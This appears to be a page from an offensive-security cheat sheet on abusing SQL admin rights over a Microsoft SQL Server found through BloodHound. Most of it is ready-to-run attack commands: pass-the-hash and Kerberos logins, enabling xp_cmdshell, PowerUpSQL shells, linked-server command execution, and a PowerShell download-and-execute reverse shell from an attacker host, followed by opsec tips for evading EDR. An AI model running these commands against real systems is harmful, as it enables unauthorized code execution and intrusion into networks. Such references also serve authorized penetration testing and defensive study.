🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / SQLAdmin

SQLAdmin

Principal has SQL admin rights on the target MSSQL instance, enabling OS command execution via xp_cmdshell.

Applies to: User β†’ Computer (running MSSQL)

Linux Abuse

mssqlclient.py (password)

mssqlclient.py <domain>/<username>:'<password>'@<target> -windows-auth

mssqlclient.py (pass-the-hash)

mssqlclient.py -hashes :<ntlm-hash> <domain>/<username>@<target> -windows-auth

mssqlclient.py (Kerberos)

KRB5CCNAME=<ccache> mssqlclient.py -k <domain>/<username>@<target> -windows-auth

Enable xp_cmdshell and exec commands

-- Run these inside mssqlclient.py session
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'net user';

Shortcut inside mssqlclient.py

# mssqlclient.py has built-in helper:
enable_xp_cmdshell
xp_cmdshell whoami

Get reverse shell via xp_cmdshell

# Start listener first
xp_cmdshell powershell -e <base64-encoded-payload>
# Or download and exec:
xp_cmdshell powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://<attacker-ip>/shell.ps1')"

Windows Abuse

PowerUpSQL β€” Invoke-SQLOSCmd

Import-Module PowerUpSQL.ps1
Invoke-SQLOSCmd -Instance <target> -Command "whoami" -RawResults

PowerUpSQL β€” Get a shell

Invoke-SQLOSCmd -Instance <target> -Command "powershell -e <base64-encoded-payload>"

PowerUpSQL β€” Enumerate instances first

Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded | Where-Object {$_.Status -eq "Accessible"}

sqlcmd (built-in)

sqlcmd -S <target> -Q "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
sqlcmd -S <target> -Q "EXEC xp_cmdshell 'whoami'"

Linked server escalation

-- Enum linked servers
SELECT * FROM sys.servers WHERE is_linked = 1;
-- Exec on linked server
EXEC ('xp_cmdshell ''whoami''') AT [<linked-server>];
-- Or via openquery
SELECT * FROM OPENQUERY([<linked-server>], 'SELECT @@version');

Opsec

  • xp_cmdshell spawns cmd.exe as child of sqlservr.exe β€” highly visible to EDR
  • Consider using Ole Automation Procedures as alternative to xp_cmdshell
  • MSSQL logs available in SQL Server Error Log and Windows Event Log
  • Default MSSQL port: 1433; named instances may use dynamic ports (check via port 1434 UDP)